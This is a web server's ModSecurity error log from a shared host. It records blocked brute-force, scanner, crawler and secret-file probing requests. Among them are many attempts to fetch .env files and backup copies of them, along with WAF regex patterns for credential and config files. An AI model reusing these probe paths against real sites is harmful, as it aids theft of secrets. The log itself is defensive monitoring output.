[Tue May 26 12:49:13.191497 2026] [security2:error] [pid 448967:tid 449208] [client 167.160.73.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVJceXLPuWQsfM-UVSwHAAAAG8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1244943&moderation-hash=9638e1b26cf6f7ba1053a7d653c10288
[Tue May 26 12:49:13.541768 2026] [security2:error] [pid 448967:tid 449098] [client 157.20.138.61:49456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJceXLPuWQsfM-UVSwIwAAAAE"]
[Tue May 26 12:49:13.542015 2026] [security2:error] [pid 448967:tid 449098] [client 157.20.138.61:49456] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJceXLPuWQsfM-UVSwIwAAAAE"]
[Tue May 26 12:49:13.596662 2026] [security2:error] [pid 448967:tid 449187] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJceXLPuWQsfM-UVSwHwAAAFo"]
[Tue May 26 12:49:13.886198 2026] [security2:error] [pid 448967:tid 449085] [remote 74.7.241.58:52602] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVJceXLPuWQsfM-UVSwOQAAQnU"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/templates/fields
[Tue May 26 12:49:15.251736 2026] [security2:error] [pid 448967:tid 449121] [client 110.249.201.194:59964] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/robots.txt"] [unique_id "ahVJc-XLPuWQsfM-UVSw0AAAABg"]
[Tue May 26 12:49:16.600061 2026] [security2:error] [pid 448967:tid 449130] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJdOXLPuWQsfM-UVSw8QAAACE"]
[Tue May 26 12:49:19.334390 2026] [security2:error] [pid 448967:tid 449100] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJduXLPuWQsfM-UVSxQQAAAAM"]
[Tue May 26 12:49:22.550360 2026] [security2:error] [pid 448967:tid 449123] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJeuXLPuWQsfM-UVSxrQAAABo"]
[Tue May 26 12:49:24.379540 2026] [security2:error] [pid 448967:tid 449160] [client 157.20.138.61:49828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJfOXLPuWQsfM-UVSyEAAAAD8"]
[Tue May 26 12:49:24.379730 2026] [security2:error] [pid 448967:tid 449160] [client 157.20.138.61:49828] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJfOXLPuWQsfM-UVSyEAAAAD8"]
[Tue May 26 12:49:24.901310 2026] [security2:error] [pid 448967:tid 449124] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJfOXLPuWQsfM-UVSyEwAAABs"]
[Tue May 26 12:49:27.845101 2026] [security2:error] [pid 448967:tid 449209] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJf-XLPuWQsfM-UVSycwAAAHA"]
[Tue May 26 12:49:30.523905 2026] [security2:error] [pid 448967:tid 449148] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJguXLPuWQsfM-UVSy6gAAADM"]
[Tue May 26 12:49:33.340271 2026] [security2:error] [pid 448967:tid 449128] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJhOXLPuWQsfM-UVSzNAAAAB8"]
[Tue May 26 12:49:35.061895 2026] [security2:error] [pid 448967:tid 449150] [client 157.20.138.61:50182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJh-XLPuWQsfM-UVSzagAAADU"]
[Tue May 26 12:49:35.062032 2026] [security2:error] [pid 448967:tid 449150] [client 157.20.138.61:50182] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJh-XLPuWQsfM-UVSzagAAADU"]
[Tue May 26 12:49:35.689316 2026] [security2:error] [pid 448967:tid 449168] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJh-XLPuWQsfM-UVSzdwAAAEc"]
[Tue May 26 12:49:36.354842 2026] [security2:error] [pid 448967:tid 449179] [client 89.117.59.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJh-XLPuWQsfM-UVSzkAAAAFI"]
[Tue May 26 12:49:36.989069 2026] [security2:error] [pid 448967:tid 449194] [client 74.249.173.207:40709] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVJiOXLPuWQsfM-UVSztAAAAGE"]
[Tue May 26 12:49:38.663892 2026] [security2:error] [pid 448967:tid 449018] [remote 49.125.215.83:61338] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVJieXLPuWQsfM-UVSzvQAANDI"]
[Tue May 26 12:49:39.349854 2026] [security2:error] [pid 448967:tid 449168] [client 208.84.100.229:19026] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/app/.env"] [unique_id "ahVJi-XLPuWQsfM-UVS0LwAAAEc"]
[Tue May 26 12:49:39.350038 2026] [security2:error] [pid 448967:tid 449113] [client 208.84.100.229:19046] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahVJi-XLPuWQsfM-UVS0LAAAABA"]
[Tue May 26 12:49:39.350045 2026] [security2:error] [pid 448967:tid 449125] [client 208.84.100.229:19034] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/api/.env"] [unique_id "ahVJi-XLPuWQsfM-UVS0LgAAABw"]
[Tue May 26 12:49:39.351169 2026] [security2:error] [pid 448967:tid 449192] [client 208.84.100.229:18990] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahVJi-XLPuWQsfM-UVS0MgAAAF8"]
[Tue May 26 12:49:39.421599 2026] [security2:error] [pid 448967:tid 449132] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJiuXLPuWQsfM-UVS0HQAAACM"]
[Tue May 26 12:49:41.845841 2026] [security2:error] [pid 448967:tid 449107] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJjeXLPuWQsfM-UVS0nAAAAAo"]
[Tue May 26 12:49:44.343443 2026] [security2:error] [pid 448967:tid 449174] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJj-XLPuWQsfM-UVS07gAAAE0"]
[Tue May 26 12:49:44.586276 2026] [security2:error] [pid 448967:tid 449065] [remote 146.196.64.107:38108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.64.196.146.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVJkOXLPuWQsfM-UVS0_AAADWE"]
[Tue May 26 12:49:45.516693 2026] [security2:error] [pid 448967:tid 449193] [client 157.20.138.61:50527] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJkeXLPuWQsfM-UVS1IQAAAGA"]
[Tue May 26 12:49:45.516817 2026] [security2:error] [pid 448967:tid 449193] [client 157.20.138.61:50527] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJkeXLPuWQsfM-UVS1IQAAAGA"]
[Tue May 26 12:49:45.548810 2026] [security2:error] [pid 448967:tid 449224] [client 208.84.100.229:19056] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.copy"] [unique_id "ahVJkeXLPuWQsfM-UVS1JwAAAH8"]
[Tue May 26 12:49:45.781086 2026] [security2:error] [pid 448967:tid 449209] [client 74.249.173.207:40705] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVJkeXLPuWQsfM-UVS1KwAAAHA"]
[Tue May 26 12:49:45.871304 2026] [proxy:error] [pid 448967:tid 449113] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:49:45.871363 2026] [proxy_http:error] [pid 448967:tid 449113] [client 185.169.4.152:61157] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:49:45.872379 2026] [proxy:error] [pid 448967:tid 449113] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:49:45.872411 2026] [proxy_http:error] [pid 448967:tid 449113] [client 185.169.4.152:61157] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:49:46.995325 2026] [security2:error] [pid 448967:tid 449154] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJkuXLPuWQsfM-UVS1QQAAADk"]
[Tue May 26 12:49:47.732054 2026] [security2:error] [pid 448967:tid 448974] [remote 5.250.187.247:56006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.187.250.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVJk-XLPuWQsfM-UVS1WgAAbAY"]
[Tue May 26 12:49:48.075944 2026] [security2:error] [pid 448967:tid 449171] [client 85.208.96.209:36074] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-12th-16th/list/"] [unique_id "ahVJlOXLPuWQsfM-UVS1cgAAAEo"]
[Tue May 26 12:49:48.076044 2026] [security2:error] [pid 448967:tid 449171] [client 85.208.96.209:36074] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-12th-16th/list/"] [unique_id "ahVJlOXLPuWQsfM-UVS1cgAAAEo"]
[Tue May 26 12:49:48.346139 2026] [security2:error] [pid 448967:tid 449197] [client 208.84.100.229:25592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.swp"] [unique_id "ahVJlOXLPuWQsfM-UVS1dgAAAGQ"]
[Tue May 26 12:49:48.351943 2026] [security2:error] [pid 448967:tid 449141] [client 208.84.100.229:25598] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.orig"] [unique_id "ahVJlOXLPuWQsfM-UVS1eAAAACw"]
[Tue May 26 12:49:48.451679 2026] [security2:error] [pid 448967:tid 449220] [client 208.84.100.229:25416] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.backup"] [unique_id "ahVJlOXLPuWQsfM-UVS1gwAAAHs"]
[Tue May 26 12:49:48.452137 2026] [security2:error] [pid 448967:tid 449222] [client 208.84.100.229:25518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local~"] [unique_id "ahVJlOXLPuWQsfM-UVS1hwAAAH0"]
[Tue May 26 12:49:48.452205 2026] [security2:error] [pid 448967:tid 449169] [client 208.84.100.229:25414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.old"] [unique_id "ahVJlOXLPuWQsfM-UVS1hAAAAEg"]
[Tue May 26 12:49:48.452988 2026] [security2:error] [pid 448967:tid 449110] [client 208.84.100.229:25570] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.backup"] [unique_id "ahVJlOXLPuWQsfM-UVS1hgAAAA0"]
[Tue May 26 12:49:48.453314 2026] [security2:error] [pid 448967:tid 449097] [client 208.84.100.229:25462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.bak"] [unique_id "ahVJlOXLPuWQsfM-UVS1iwAAAAA"]
[Tue May 26 12:49:48.453948 2026] [security2:error] [pid 448967:tid 449128] [client 208.84.100.229:25520] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.swp"] [unique_id "ahVJlOXLPuWQsfM-UVS1jgAAAB8"]
[Tue May 26 12:49:48.454000 2026] [security2:error] [pid 448967:tid 449211] [client 208.84.100.229:25530] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.orig"] [unique_id "ahVJlOXLPuWQsfM-UVS1jwAAAHI"]
[Tue May 26 12:49:48.454367 2026] [security2:error] [pid 448967:tid 449179] [client 208.84.100.229:25428] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env~"] [unique_id "ahVJlOXLPuWQsfM-UVS1kAAAAFI"]
[Tue May 26 12:49:48.454504 2026] [security2:error] [pid 448967:tid 449132] [client 208.84.100.229:25478] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.old"] [unique_id "ahVJlOXLPuWQsfM-UVS1kQAAACM"]
[Tue May 26 12:49:48.454532 2026] [security2:error] [pid 448967:tid 449195] [client 208.84.100.229:25540] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.copy"] [unique_id "ahVJlOXLPuWQsfM-UVS1jQAAAGI"]
[Tue May 26 12:49:48.455138 2026] [security2:error] [pid 448967:tid 449206] [client 208.84.100.229:25446] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.orig"] [unique_id "ahVJlOXLPuWQsfM-UVS1kgAAAG0"]
[Tue May 26 12:49:48.455209 2026] [security2:error] [pid 448967:tid 449198] [client 208.84.100.229:25438] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.swp"] [unique_id "ahVJlOXLPuWQsfM-UVS1kwAAAGU"]
[Tue May 26 12:49:48.455591 2026] [security2:error] [pid 448967:tid 449157] [client 208.84.100.229:25402] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.bak"] [unique_id "ahVJlOXLPuWQsfM-UVS1lgAAADw"]
[Tue May 26 12:49:48.456020 2026] [security2:error] [pid 448967:tid 449144] [client 208.84.100.229:25490] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.backup"] [unique_id "ahVJlOXLPuWQsfM-UVS1lAAAAC8"]
